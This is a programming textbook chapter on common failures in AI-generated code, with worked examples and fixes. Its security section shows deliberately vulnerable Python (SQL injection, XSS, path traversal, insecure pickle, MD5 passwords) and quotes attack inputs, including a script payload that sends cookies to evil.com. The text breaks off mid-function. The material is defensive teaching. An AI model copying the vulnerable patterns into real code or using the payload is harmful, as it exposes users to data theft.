> "The first rule of working with AI-generated code is the same as the first rule of working with any code: it might be wrong." — Adapted from Kernighan's Law
In This Chapter
- Learning Objectives
- Introduction
- 14.1 The Taxonomy of AI Coding Failures
- 14.2 Hallucinated APIs and Libraries
- 14.3 Subtle Logic Errors
- 14.4 Security Vulnerabilities in AI Code
- 14.5 Performance Anti-Patterns
- 14.6 Outdated Patterns and Deprecated APIs
- 14.7 The Confidence Problem: When AI Sounds Right but Isn't
- 14.8 Debugging AI-Generated Code Systematically
- 14.9 Recovery Strategies and Conversation Repair
- 14.10 Building Resilience: The Trust-but-Verify Mindset
- Chapter Summary
Chapter 14: When AI Gets It Wrong
"The first rule of working with AI-generated code is the same as the first rule of working with any code: it might be wrong." — Adapted from Kernighan's Law
Learning Objectives
By the end of this chapter, you will be able to:
- Remember the major categories of AI coding failures and recognize examples of each (Bloom's: Remember)
- Understand why AI models produce hallucinated APIs, subtle logic errors, and security vulnerabilities (Bloom's: Understand)
- Analyze AI-generated code for common failure patterns including off-by-one errors, race conditions, and performance anti-patterns (Bloom's: Analyze)
- Evaluate the confidence level of AI-generated code and identify situations where the AI is likely wrong despite sounding certain (Bloom's: Evaluate)
- Apply systematic debugging approaches specifically designed for AI-generated code (Bloom's: Apply)
- Create verification workflows that catch AI mistakes before they reach production (Bloom's: Create)
Introduction
Every chapter of this book so far has celebrated what AI coding assistants can do. This chapter is different. This chapter is about what they get wrong — and they get things wrong often.
If you have been following along, you have probably already encountered moments where AI-generated code looked correct, ran without errors on your first test, and then failed spectacularly under real-world conditions. Perhaps a library import referenced a package that does not exist. Perhaps a loop processed one too many or one too few items. Perhaps the code worked perfectly — except it was wide open to SQL injection.
This chapter is not meant to scare you away from AI-assisted development. It is meant to make you better at it. The developers who struggle most with vibe coding are not those who lack programming skill — they are the ones who trust AI output without verification. The developers who thrive are those who have internalized what we call the trust-but-verify mindset: use AI as a powerful collaborator, but always validate its work.
We will build a comprehensive taxonomy of AI coding failures, examine real examples of each failure type, develop systematic debugging strategies, and learn recovery techniques for when a conversation with an AI assistant goes off the rails. By the end, you will have the skills to catch AI mistakes before your users do.
Note: This chapter builds directly on the code review skills from Chapter 7. If you skipped that chapter, consider reading Section 7.6 (Spotting Potential Issues) before continuing.
14.1 The Taxonomy of AI Coding Failures
Before we dive into specific failure types, it helps to have a map of the territory. AI coding failures fall into several distinct categories, each with different causes, detection difficulty, and potential impact.
The Failure Spectrum
AI coding failures range from immediately obvious to deeply hidden:
| Category | Detection Difficulty | Typical Impact | Example |
|---|---|---|---|
| Hallucinated APIs | Easy (import fails) | Build failure | from sklearn.neural import DeepClassifier |
| Syntax errors | Easy (interpreter catches) | Build failure | Mismatched parentheses, invalid Python |
| Runtime errors | Medium (fails on execution) | Crash | TypeError from wrong argument types |
| Logic errors | Hard (produces wrong results) | Silent data corruption | Off-by-one in loop bounds |
| Security vulnerabilities | Hard (works correctly but unsafely) | Data breach | SQL injection, XSS, hardcoded secrets |
| Performance anti-patterns | Hard (works but slowly) | Degraded user experience | N+1 queries, blocking I/O |
| Outdated patterns | Medium (may work but deprecated) | Technical debt | Using removed APIs, old syntax |
| Architectural issues | Very hard (works at small scale) | Scalability failure | Tight coupling, missing abstractions |
Why AI Gets Things Wrong
Understanding why AI makes mistakes helps you predict when it will make them. The root causes include:
Training data mixture. AI models learn from vast corpora of code, which includes both excellent code and terrible code. The model does not inherently know which is which. Code from Stack Overflow answers, tutorials written by beginners, and outdated blog posts all contribute to the training data alongside production-quality code.
Statistical pattern matching. Language models predict the most likely next token based on patterns in training data. When a pattern is common but wrong — such as a frequently repeated security anti-pattern — the model may reproduce it confidently.
Knowledge cutoff. Models have a training data cutoff date. APIs change, libraries release new major versions, and best practices evolve. The model does not know about these changes.
Context limitations. Models work within a limited context window. When your project grows beyond what fits in context, the model may lose track of important constraints, data types, or architectural decisions made earlier.
The completion imperative. AI assistants are trained to be helpful and to provide complete answers. They almost never say "I don't know" or "I'm not sure about this." When the model lacks knowledge, it generates plausible-sounding but incorrect code rather than admitting uncertainty.
Intuition: Think of AI-generated code as a first draft from a junior developer who is very well-read but has never actually run any code in production. They know patterns and conventions, but they have not felt the pain of a 2 AM production incident caused by an unhandled edge case.
The Criticality Matrix
Not all failures are equally dangerous. Use this matrix to prioritize what to verify:
| | Low Likelihood | High Likelihood |
|---|---|---|
| High Impact | Security vulnerabilities, race conditions | Logic errors in business rules |
| Low Impact | Stylistic inconsistencies | Verbose or non-idiomatic code |
Always verify high-impact areas first, regardless of likelihood. A single SQL injection vulnerability matters more than a hundred stylistic issues.
14.2 Hallucinated APIs and Libraries
The most distinctive failure mode of AI coding assistants is hallucination — generating references to functions, methods, classes, or entire libraries that do not exist. This is not a bug in the traditional sense; the AI has essentially invented an API that seems like it should exist based on naming conventions and patterns in the training data.
What Hallucination Looks Like
Here is an example. You ask an AI assistant to help you with image processing, and it produces:
from PIL import Image
from PIL.Filters import AdaptiveSharpening
def enhance_image(path: str, strength: float = 0.8) -> Image.Image:
"""Enhance image sharpness using adaptive sharpening."""
img = Image.open(path)
sharpened = img.filter(AdaptiveSharpening(strength=strength))
return sharpened
This code looks perfectly reasonable. The PIL library is real. The Image class is real. The coding style is correct. But PIL.Filters.AdaptiveSharpening does not exist. The AI invented it because it sounds like something that should exist in an image processing library. The actual PIL approach would use ImageFilter.SHARPEN or ImageEnhance.Sharpness.
Common Hallucination Patterns
Invented submodules. The AI correctly identifies a real library but invents a submodule within it:
# Hallucinated: requests.async does not exist
from requests.async import AsyncSession
# Real alternatives:
import aiohttp
# or
from httpx import AsyncClient
Non-existent function parameters. The function is real, but the AI adds parameters that do not exist:
# Hallucinated: 'encoding' is not a valid parameter for json.loads
data = json.loads(raw_text, encoding="utf-8")
# Correct (encoding parameter was removed in Python 3.9):
data = json.loads(raw_text)
Plausible method names. The AI generates a method name that follows the library's naming convention but does not actually exist:
# Hallucinated: pandas has no .to_nested_json() method
df.to_nested_json("output.json")
# Real approach:
df.to_json("output.json", orient="records")
Entirely fabricated libraries. Sometimes the AI invents entire packages:
# Hallucinated: this package does not exist
from datavalidator import Schema, validate_strict
# Real alternatives:
from pydantic import BaseModel
# or
from marshmallow import Schema, fields
Common Pitfall: Hallucinated package names are especially dangerous because someone could create a malicious package with that exact name on PyPI. This is called dependency confusion or typosquatting. If you pip install a hallucinated package name, you might actually install malware that someone published under that name. Always verify that a package exists and is legitimate before installing it.
How to Detect Hallucinations
Run the code immediately. The simplest test is to execute the imports. If Python raises an ImportError or ModuleNotFoundError, you have found a hallucination.
Check official documentation. Before using any API the AI suggests, verify it exists in the official documentation. This takes seconds and prevents hours of debugging.
Use your IDE. Modern IDEs with language server support will flag unresolved imports with red underlines before you even run the code.
Search PyPI for packages. If the AI suggests a library you have not heard of, search for it on pypi.org before running pip install.
Verify on the REPL. Open a Python REPL and try:
import some_module
dir(some_module) # List actual attributes
help(some_module.some_function) # Check actual signature
Best Practice: Build a habit of verifying every import that an AI suggests if you are not already familiar with the library. This single practice will eliminate the most embarrassing category of AI-generated bugs.
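One way to automate that habit is a small helper that checks each module name against the current environment before you run anything. This is a sketch, not a standard tool: check_imports is our own name, and importlib.util.find_spec only confirms a module is installed locally, not that it is a legitimate PyPI package.

```python
import importlib.util

def check_imports(module_names: list[str]) -> dict[str, bool]:
    """Report whether each module name resolves in this environment."""
    results = {}
    for name in module_names:
        try:
            # find_spec returns None for modules that cannot be found; it
            # raises ModuleNotFoundError when a dotted name's parent
            # package is itself missing.
            results[name] = importlib.util.find_spec(name) is not None
        except (ImportError, ValueError):
            results[name] = False
    return results

print(check_imports(["json", "PIL.Filters", "requests.async"]))
```

The hallucinated submodules from this section come back False whether or not Pillow and requests are installed, while real stdlib names come back True.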
14.3 Subtle Logic Errors
Logic errors are far more dangerous than hallucinated APIs because the code runs without errors — it just produces wrong results. These bugs can persist for months before anyone notices.
Off-by-One Errors
The classic off-by-one error is AI's most frequent logic mistake. Consider this AI-generated function to extract a sublist:
def get_page(items: list, page: int, page_size: int) -> list:
"""Return a page of items from a list."""
start = page * page_size
end = start + page_size + 1 # BUG: +1 causes overlap between pages
return items[start:end]
The bug is on the line computing end. Python slicing already excludes the end index, so adding 1 means each page returns one extra item (overlapping with the next page). The correct version:
def get_page(items: list, page: int, page_size: int) -> list:
"""Return a page of items from a list."""
start = page * page_size
end = start + page_size # Correct: Python slicing is already exclusive
return items[start:end]
Boundary Condition Errors
AI often fails to handle empty inputs, single-element collections, or maximum values:
def find_median(numbers: list[float]) -> float:
"""Find the median of a list of numbers."""
sorted_nums = sorted(numbers)
mid = len(sorted_nums) // 2
if len(sorted_nums) % 2 == 0:
return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
return sorted_nums[mid]
This code looks correct — and it works for most inputs. But what happens when numbers is empty? sorted_nums becomes [], mid becomes 0, and we get an IndexError. The AI did not add a guard clause:
def find_median(numbers: list[float]) -> float:
"""Find the median of a list of numbers."""
if not numbers:
raise ValueError("Cannot compute median of empty list")
sorted_nums = sorted(numbers)
mid = len(sorted_nums) // 2
if len(sorted_nums) % 2 == 0:
return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
return sorted_nums[mid]
Race Conditions
When AI generates concurrent code, race conditions are common because the model focuses on the happy path:
import threading
class Counter:
"""Thread-safe counter.""" # BUG: Not actually thread-safe!
def __init__(self):
self.value = 0
def increment(self):
self.value += 1 # Race condition: read-modify-write is not atomic
def get(self) -> int:
return self.value
The docstring says "thread-safe" but the implementation is not. The += operation involves reading the current value, adding one, and writing back — three steps that can be interleaved between threads. The fix:
import threading
class Counter:
"""Thread-safe counter using a lock."""
def __init__(self):
self.value = 0
self._lock = threading.Lock()
def increment(self):
with self._lock:
self.value += 1
def get(self) -> int:
with self._lock:
return self.value
Incorrect Algorithm Implementation
Sometimes AI produces code that almost implements the right algorithm but has a subtle flaw:
def binary_search(arr: list[int], target: int) -> int:
"""Return index of target in sorted array, or -1 if not found."""
low, high = 0, len(arr) - 1
while low <= high:
mid = (low + high) // 2 # Potential integer overflow in other languages
if arr[mid] == target:
return mid
elif arr[mid] < target:
low = mid # BUG: should be mid + 1
else:
high = mid # BUG: should be mid - 1
return -1
This binary search can enter an infinite loop. When arr[mid] < target, setting low = mid (instead of mid + 1) means that if low and high are adjacent, mid will equal low forever. The corrected version uses low = mid + 1 and high = mid - 1.
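Applying those two fixes gives the corrected version:

```python
def binary_search(arr: list[int], target: int) -> int:
    """Return index of target in sorted array, or -1 if not found."""
    low, high = 0, len(arr) - 1
    while low <= high:
        mid = (low + high) // 2
        if arr[mid] == target:
            return mid
        elif arr[mid] < target:
            low = mid + 1   # mid is already ruled out, so move past it
        else:
            high = mid - 1  # likewise on the high side
    return -1
```

Because low and high now always move past mid, the search space shrinks on every iteration and the loop must terminate.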
Real-World Application: In production systems, subtle logic errors in data processing pipelines can corrupt millions of records before anyone notices. One real-world example involved an AI-generated ETL (Extract, Transform, Load) script that had an off-by-one error in date range filtering. It skipped the first day of every month, leading to systematic data loss that was not caught for three weeks.
Incorrect Regular Expressions
AI frequently generates regex patterns that are close but not quite right:
import re
def validate_email(email: str) -> bool:
"""Validate an email address."""
pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
return bool(re.match(pattern, email))
This pattern looks reasonable but rejects valid emails with characters like !, #, or ' in the local part (which are technically allowed by RFC 5321). It also accepts invalid addresses such as user@-.com (a hyphen-only domain label) and user@com..example (consecutive dots in the domain). Email validation is notoriously hard, and AI tends to produce the "common but wrong" regex from countless Stack Overflow answers.
Common Pitfall: Be especially suspicious of AI-generated regular expressions. They frequently handle the common cases correctly while failing on edge cases. Always test regex patterns with a comprehensive set of both valid and invalid inputs, including edge cases.
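That advice is easy to act on: a handful of assertions documents exactly where a pattern misbehaves, in both directions. The validator below is the AI-generated one from above, reproduced so the test is self-contained; the assertions record its actual (buggy) behavior.

```python
import re

def validate_email(email: str) -> bool:
    """The AI-generated validator from above, reproduced for testing."""
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    return bool(re.match(pattern, email))

# Cases the pattern handles correctly
assert validate_email("alice@example.com")
assert not validate_email("not-an-email")

# A valid address it wrongly rejects: '!' is legal in the local part
assert not validate_email("user!tag@example.com")

# Invalid addresses it wrongly accepts: the domain part is too permissive
assert validate_email("user@com..example")   # consecutive dots
assert validate_email("user@-.com")          # hyphen-only label
```

Keeping a test file like this around means any replacement pattern can be checked against the same edge cases in seconds.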
14.4 Security Vulnerabilities in AI Code
Security vulnerabilities in AI-generated code deserve special attention because they are simultaneously common, hard to detect, and potentially catastrophic. The model has seen millions of examples of insecure code patterns — and it reproduces them faithfully.
SQL Injection
The most classic web vulnerability, and AI generates it routinely:
def get_user(username: str) -> dict:
"""Fetch user from database."""
query = f"SELECT * FROM users WHERE username = '{username}'" # VULNERABLE
cursor.execute(query)
return cursor.fetchone()
If username is ' OR '1'='1' --, this query returns all users. The fix is parameterized queries:
def get_user(username: str) -> dict:
"""Fetch user from database."""
query = "SELECT * FROM users WHERE username = %s" # Safe: parameterized
cursor.execute(query, (username,))
return cursor.fetchone()
Common Pitfall: AI assistants will sometimes generate parameterized queries in some functions and string-concatenated queries in others within the same codebase. Inconsistency is the enemy of security. Review every database query, not just the ones that look suspicious.
Cross-Site Scripting (XSS)
When generating web code, AI often fails to escape user input:
from flask import Flask, request
app = Flask(__name__)
@app.route('/search')
def search():
query = request.args.get('q', '')
# VULNERABLE: user input directly in HTML
return f"<h1>Search results for: {query}</h1>"
An attacker can inject <script>document.location='http://evil.com/steal?c='+document.cookie</script> as the query parameter. The fix uses proper escaping:
from flask import Flask, request
from markupsafe import escape
app = Flask(__name__)
@app.route('/search')
def search():
query = request.args.get('q', '')
return f"<h1>Search results for: {escape(query)}</h1>" # Safe: escaped
Hardcoded Secrets
AI assistants frequently generate code with placeholder secrets that look like they should be replaced but sometimes are not:
import jwt
SECRET_KEY = "super-secret-key-change-me" # VULNERABLE: hardcoded secret
def create_token(user_id: int) -> str:
return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")
The fix uses environment variables:
import os
import jwt
SECRET_KEY = os.environ["JWT_SECRET_KEY"] # Safe: from environment
def create_token(user_id: int) -> str:
return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")
Path Traversal
AI-generated file-handling code often fails to validate paths:
from flask import Flask, send_file, request
app = Flask(__name__)
@app.route('/download')
def download():
filename = request.args.get('file')
# VULNERABLE: allows ../../etc/passwd
return send_file(f'/uploads/{filename}')
The fix validates the resolved path:
import os
from pathlib import Path
from flask import Flask, send_file, request, abort
app = Flask(__name__)
UPLOAD_DIR = Path('/uploads').resolve()
@app.route('/download')
def download():
filename = request.args.get('file')
if not filename:
abort(400)
file_path = (UPLOAD_DIR / filename).resolve()
if not file_path.is_relative_to(UPLOAD_DIR): # Python 3.9+; a plain startswith check would also match siblings like /uploads-evil
abort(403) # Path traversal attempt
if not file_path.is_file():
abort(404)
return send_file(file_path)
Insecure Deserialization
AI sometimes suggests pickle for data serialization without warning about the dangers:
import pickle
def load_user_data(data_bytes: bytes) -> dict:
"""Load user-submitted data."""
return pickle.loads(data_bytes) # VULNERABLE: arbitrary code execution
Using pickle.loads on untrusted data allows arbitrary code execution. If the data comes from a user or external source, use json instead:
import json
def load_user_data(data_bytes: bytes) -> dict:
"""Load user-submitted data."""
return json.loads(data_bytes) # Safe: JSON cannot execute code
Weak Cryptography
AI models sometimes suggest outdated or weak cryptographic algorithms:
import hashlib
def hash_password(password: str) -> str:
"""Hash a password for storage."""
return hashlib.md5(password.encode()).hexdigest() # VULNERABLE: MD5 is broken
MD5 is cryptographically broken and unsuitable for password hashing. Even SHA-256 alone is not appropriate for passwords (it is too fast). The correct approach uses a purpose-built password hashing function:
import bcrypt
def hash_password(password: str) -> bytes:
"""Hash a password for storage using bcrypt."""
return bcrypt.hashpw(password.encode(), bcrypt.gensalt())
def verify_password(password: str, hashed: bytes) -> bool:
"""Verify a password against its hash."""
return bcrypt.checkpw(password.encode(), hashed)
Best Practice: For security-critical code, never accept AI output at face value. Cross-reference against the OWASP Top 10 (owasp.org/www-project-top-ten) and use security-focused static analysis tools like bandit for Python. The few minutes this takes can prevent catastrophic breaches.
14.5 Performance Anti-Patterns
AI-generated code often prioritizes readability and correctness over performance. While this is usually the right trade-off for prototypes, it can create serious problems in production systems.
The N+1 Query Problem
This is the most common performance anti-pattern in AI-generated database code:
def get_all_orders_with_customers(db_session):
"""Get all orders with customer details."""
orders = db_session.query(Order).all() # 1 query
result = []
for order in orders:
customer = db_session.query(Customer).get(order.customer_id) # N queries
result.append({
"order_id": order.id,
"total": order.total,
"customer_name": customer.name
})
return result
For 1,000 orders, this executes 1,001 database queries. The fix uses a JOIN or eager loading:
def get_all_orders_with_customers(db_session):
"""Get all orders with customer details using a JOIN."""
results = (
db_session.query(Order, Customer)
.join(Customer, Order.customer_id == Customer.id)
.all()
)
return [
{
"order_id": order.id,
"total": order.total,
"customer_name": customer.name
}
for order, customer in results
]
Unnecessary Data Copying
AI frequently generates code that copies data structures unnecessarily:
def process_large_dataset(data: list[dict]) -> list[dict]:
"""Process and filter a large dataset."""
# Unnecessary copy: sorted() creates a new list
sorted_data = sorted(data, key=lambda x: x['timestamp'])
# Another copy: list comprehension creates another new list
filtered = [item for item in sorted_data if item['status'] == 'active']
# Yet another copy: another list comprehension
result = [
{**item, 'processed': True}
for item in filtered
]
return result
For a dataset of millions of records, this creates three full copies. A more memory-efficient approach sorts the list in place and fuses the filtering and transformation into a single comprehension:
def process_large_dataset(data: list[dict]) -> list[dict]:
"""Process and filter a large dataset efficiently."""
data.sort(key=lambda x: x['timestamp']) # In-place sort
return [
{**item, 'processed': True}
for item in data
if item['status'] == 'active'
]
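When the results are consumed one at a time rather than all at once, a generator avoids materializing even the final list. This is a sketch; iter_active is our own name for an alternative to the function above:

```python
from typing import Iterator

def iter_active(data: list[dict]) -> Iterator[dict]:
    """Yield processed active records one at a time, sorted by timestamp."""
    data.sort(key=lambda x: x['timestamp'])  # in-place sort, no copy
    for item in data:
        if item['status'] == 'active':
            yield {**item, 'processed': True}
```

A caller can write `for record in iter_active(rows): ...` and hold only one record in memory at a time, at the cost of mutating the input list's order.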
Blocking I/O in Async Code
AI sometimes mixes synchronous and asynchronous patterns:
import asyncio
import requests # Synchronous library!
async def fetch_all_urls(urls: list[str]) -> list[str]:
"""Fetch all URLs concurrently."""
results = []
for url in urls:
# BUG: requests.get is blocking, defeats the purpose of async
response = requests.get(url)
results.append(response.text)
return results
This code uses async but makes blocking HTTP calls, so nothing actually runs concurrently. The fix uses an async HTTP library:
import asyncio
import aiohttp
async def fetch_all_urls(urls: list[str]) -> list[str]:
"""Fetch all URLs concurrently."""
async with aiohttp.ClientSession() as session:
tasks = [fetch_one(session, url) for url in urls]
return await asyncio.gather(*tasks)
async def fetch_one(session: aiohttp.ClientSession, url: str) -> str:
"""Fetch a single URL."""
async with session.get(url) as response:
return await response.text()
Quadratic Algorithms Hidden in Clean Code
Sometimes AI generates beautifully readable code that hides O(n^2) complexity:
def find_duplicates(items: list[str]) -> list[str]:
"""Find duplicate items in a list."""
duplicates = []
for item in items:
if items.count(item) > 1 and item not in duplicates: # O(n) * 2 per iteration
duplicates.append(item)
return duplicates
The items.count() call is O(n) and item not in duplicates is also O(n), making this O(n^2). For a list of 100,000 items, this becomes unusably slow. The fix uses a set:
from collections import Counter
def find_duplicates(items: list[str]) -> list[str]:
"""Find duplicate items in a list."""
counts = Counter(items) # O(n)
return [item for item, count in counts.items() if count > 1] # O(n)
Advanced: When reviewing AI-generated code for performance, mentally trace the time complexity of each line. Look for nested loops, .count() calls inside loops, in checks on lists (O(n)) versus sets (O(1)), and string concatenation in loops (which creates a new string each iteration).
14.6 Outdated Patterns and Deprecated APIs
AI models are trained on historical data, which means they sometimes suggest patterns that were appropriate years ago but are now outdated or deprecated.
Python 2 Remnants
Even though Python 2 reached end-of-life in January 2020, AI occasionally generates Python 2 patterns:
# Outdated: Python 2 style print statement
print "Hello, world"
# Outdated: Python 2 style string formatting
message = "Hello, %s. You are %d years old." % (name, age)
# Outdated: Python 2 style exception handling
try:
risky_operation()
except Exception, e:
print e
# Outdated: inheriting from object explicitly (unnecessary in Python 3)
class MyClass(object):
pass
The modern Python 3 equivalents:
print("Hello, world")
message = f"Hello, {name}. You are {age} years old."
try:
risky_operation()
except Exception as e:
print(e)
class MyClass:
pass
Deprecated Standard Library Usage
# Deprecated: asyncio.get_event_loop() in Python 3.10+
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
# Modern:
asyncio.run(main())
# Deprecated: using typing.List, typing.Dict in Python 3.9+
from typing import List, Dict
def process(items: List[Dict[str, int]]) -> List[str]:
pass
# Modern: use built-in types directly
def process(items: list[dict[str, int]]) -> list[str]:
pass
# Deprecated: os.path for path manipulation
import os
path = os.path.join(base_dir, "data", "file.txt")
exists = os.path.exists(path)
# Modern: pathlib
from pathlib import Path
path = Path(base_dir) / "data" / "file.txt"
exists = path.exists()
Framework-Specific Deprecations
AI often suggests deprecated patterns from popular frameworks:
# Older Flask style (pre-2.0): methods= still works but is more verbose
@app.route('/users', methods=['GET'])
def get_users():
pass
@app.route('/users', methods=['POST'])
def create_user():
pass
# Modern Flask (2.0+)
@app.get('/users')
def get_users():
pass
@app.post('/users')
def create_user():
pass
# Deprecated SQLAlchemy 1.x query style
users = session.query(User).filter(User.age > 18).all()
# Modern SQLAlchemy 2.x style
from sqlalchemy import select
stmt = select(User).where(User.age > 18)
users = session.execute(stmt).scalars().all()
Best Practice: When an AI suggests a library pattern you are not sure about, check the library's changelog or migration guide. Search for phrases like "[library name] deprecation warnings" or "[library name] migration guide" to quickly identify whether the suggested pattern is current.
Detecting Outdated Patterns
Python's warning system can help catch deprecated usage:
import warnings
warnings.filterwarnings('error', category=DeprecationWarning)
This converts deprecation warnings into errors, making them impossible to ignore during testing. You can also use tools like pyupgrade to automatically modernize Python syntax.
14.7 The Confidence Problem: When AI Sounds Right but Isn't
Perhaps the most insidious aspect of AI coding failures is the confidence problem. AI assistants present incorrect code with the same confident tone as correct code. There is no "I'm not sure" disclaimer, no wavering, no hedge. This makes it psychologically difficult to question AI-generated output.
Why AI Never Says "I Don't Know"
Language models generate text token by token, predicting the most probable next token based on context. They do not have an internal mechanism for evaluating their own uncertainty. The model does not think, "I'm 40% confident in this function" — it simply generates the most likely completion given the prompt.
This means:
- Completely fabricated APIs are described as if they are standard library features
- Incorrect algorithm implementations come with detailed, accurate-sounding docstrings
- Security anti-patterns are presented alongside correct code with no distinction
- Made-up configuration options are suggested with plausible-sounding explanations
The Expertise Illusion
AI-generated code often reads like it was written by an expert. The variable names are well-chosen, the docstrings are thorough, the code style is clean. This creates an expertise illusion where the superficial quality of the code masks substantive errors.
Consider this example:
def calculate_compound_interest(
principal: float,
annual_rate: float,
years: int,
compounding_frequency: int = 12
) -> float:
"""
Calculate compound interest using the standard formula.
A = P(1 + r/n)^(nt)
Args:
principal: Initial investment amount
annual_rate: Annual interest rate as a decimal (e.g., 0.05 for 5%)
years: Number of years
compounding_frequency: Times interest is compounded per year
Returns:
Final amount after compound interest
"""
amount = principal * (1 + annual_rate / compounding_frequency) ** (
compounding_frequency * years
)
return round(amount, 2)
This looks flawless. The docstring is thorough, the type hints are correct, the formula is clearly documented. But what if the caller passes annual_rate=5 (meaning 5%) instead of annual_rate=0.05? The function will silently return an astronomically wrong result. An experienced developer would add validation:
if annual_rate > 1:
raise ValueError(
f"annual_rate={annual_rate} seems too high. "
f"Did you mean {annual_rate / 100}? Pass rate as a decimal (0.05 for 5%)."
)
The AI's polished presentation made it easy to skip critical review.
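Folding that guard into the function from above yields a version that fails loudly on the unit mistake instead of silently returning an astronomically wrong number:

```python
def calculate_compound_interest(
    principal: float,
    annual_rate: float,
    years: int,
    compounding_frequency: int = 12,
) -> float:
    """Compound interest with a sanity check on the rate's units."""
    if annual_rate > 1:
        raise ValueError(
            f"annual_rate={annual_rate} seems too high. "
            f"Did you mean {annual_rate / 100}? Pass rate as a decimal (0.05 for 5%)."
        )
    amount = principal * (1 + annual_rate / compounding_frequency) ** (
        compounding_frequency * years
    )
    return round(amount, 2)
```

Now calculate_compound_interest(1000, 5, 1) raises a ValueError that names the likely fix, while the decimal form 0.05 computes normally.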
Signals That AI Might Be Wrong
While AI does not flag its own uncertainty, there are signals you can watch for:
Overly specific details on obscure topics. If the AI provides very detailed configuration for a niche library or platform, verify every option. AI is most likely to hallucinate when the topic has limited representation in training data.
Inconsistency within the same response. If the AI uses one approach in one function and a contradictory approach in another, at least one is wrong.
Suspiciously convenient solutions. If a complex problem is solved with a single function call to an API you have never heard of, verify that the API exists.
Solutions that avoid the hard part. If the AI's solution to a complex problem seems too simple, it may have glossed over essential complexity (error handling, edge cases, concurrency control).
Code that matches common but wrong patterns. Patterns that appear frequently in tutorials and Stack Overflow answers (like using MD5 for passwords or string formatting for SQL) are exactly what AI reproduces most confidently.
Intuition: Develop a "that's too easy" instinct. When a genuinely hard problem gets a clean, short solution from the AI, that is your signal to verify extra carefully. Hard problems usually require hard solutions, and if the code seems too neat, important complexity may be missing.
14.8 Debugging AI-Generated Code Systematically
Debugging AI-generated code requires a different approach than debugging code you wrote yourself. You did not write it, so you lack the mental model of how it is supposed to work. You need to build that mental model before you can find the bugs.
The VERIFY Framework
Use this systematic framework when reviewing AI-generated code:
V — Validate imports. Check that every imported module and name actually exists. Run the imports in a REPL.
E — Examine edge cases. Test with empty inputs, single elements, maximum values, None/null values, and negative numbers.
R — Review security. Check for SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, and weak cryptography.
I — Inspect logic. Trace through the code mentally with concrete values. Pay special attention to loop bounds, comparison operators (< vs <=, > vs >=), and return values.
F — Find performance issues. Look for nested loops, queries inside loops, unnecessary copying, and blocking operations in async code.
Y — Yell about types. Check that types match expectations throughout the data flow. A function that receives a string when it expects an integer will fail silently or produce wrong results.
Practical Debugging Techniques
Add assertion statements. Before and after AI-generated code blocks, add assertions that verify your expectations:
def process_orders(orders: list[dict]) -> list[dict]:
    assert all(isinstance(o, dict) for o in orders), "All orders must be dicts"
    assert all('id' in o for o in orders), "All orders must have 'id'"
    result = ai_generated_processing_logic(orders)
    assert len(result) <= len(orders), "Should not create more orders than input"
    assert all('total' in r for r in result), "All results must have 'total'"
    return result
Use print debugging strategically. When you cannot understand what AI-generated code is doing, add print statements at key points:
def mystery_function(data):
    print(f"Input: {data[:3]}... (length={len(data)})")  # Sample first 3
    intermediate = step_one(data)
    print(f"After step_one: {type(intermediate)}, length={len(intermediate)}")
    result = step_two(intermediate)
    print(f"After step_two: {type(result)}, first_item={result[0] if result else 'EMPTY'}")
    return result
Write targeted test cases. Create tests that specifically probe the areas where AI is likely to fail:
def test_pagination_edge_cases():
    """Test AI-generated pagination with tricky inputs."""
    items = list(range(10))
    # Normal case
    assert get_page(items, 0, 3) == [0, 1, 2]
    assert get_page(items, 1, 3) == [3, 4, 5]
    # Edge cases AI often gets wrong
    assert get_page(items, 3, 3) == [9]       # Last partial page
    assert get_page(items, 4, 3) == []        # Beyond last page
    assert get_page([], 0, 3) == []           # Empty list
    assert get_page(items, 0, 100) == items   # Page size > list size
Use a debugger. For complex AI-generated code, step through it in a debugger rather than trying to understand it by reading alone:
# Add this line before the suspicious code
# (on Python 3.7+, the built-in breakpoint() does the same thing)
import pdb; pdb.set_trace()
Or use VS Code's built-in debugger with breakpoints.
Best Practice: When debugging AI-generated code, resist the urge to fix the code before you understand it. First build a complete mental model of what the code does (right and wrong). Then fix it. If you patch symptoms without understanding, you will introduce new bugs.
Type Checking as a Debugging Tool
Static type checking catches many AI errors before runtime:
# Install mypy: pip install mypy
# Run: mypy your_file.py
AI-generated code often has type inconsistencies that mypy catches:
def get_user_age(user: dict[str, int]) -> int:
    return user.get('age')  # mypy error: returns "Optional[int]", not "int"
Using Linters Effectively
Configure your linter to catch common AI mistakes:
# .flake8 configuration
[flake8]
max-complexity = 10
select = E,W,F,C90
Tools like pylint, ruff, and flake8 catch issues that are invisible to the eye but obvious to static analysis.
14.9 Recovery Strategies and Conversation Repair
Sometimes an AI conversation goes so far off track that individual bug fixes are not enough. You need strategies for recovering the conversation — getting the AI back on a productive path.
Recognizing a Derailed Conversation
Signs that your AI conversation has gone off the rails:
- Circular fixes: You report a bug, the AI "fixes" it but introduces a new bug, you report that, and the cycle repeats.
- Contradictory approaches: The AI switches between fundamentally different architectural approaches across responses.
- Increasing complexity: Each "fix" makes the code more complex rather than simpler.
- Losing context: The AI forgets constraints or requirements you specified earlier.
- Cargo cult fixes: The AI makes changes that look relevant but do not actually address the problem.
The Nuclear Option: Start Fresh
Sometimes the best recovery strategy is to start a new conversation. This is especially appropriate when:
- The context window is heavily polluted with failed attempts
- The AI has adopted a fundamentally wrong architecture
- More than three rounds of fixes have failed to resolve the issue
When starting fresh, include in your new prompt:
- A clear description of what you are building
- The specific constraints and requirements
- What approach you tried before and why it failed
- The specific behavior you need
I'm building a pagination function for a REST API. My previous
attempt had off-by-one errors in the page boundaries.
Requirements:
- Pages are 0-indexed (first page is page 0)
- page_size items per page
- Last page may have fewer than page_size items
- Requesting beyond the last page returns empty list
- Empty input returns empty list for any page
Please generate the function with comprehensive edge case handling.
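A function meeting the requirements in the prompt above could look like the following sketch (the name `get_page` matches the edge-case tests earlier in this chapter; the exact signature is an assumption):

```python
def get_page(items: list, page: int, page_size: int) -> list:
    """Return one 0-indexed page of `items`.

    The last page may be shorter than `page_size`; requesting beyond
    the last page, or paginating an empty list, returns [].
    """
    if page < 0 or page_size <= 0:
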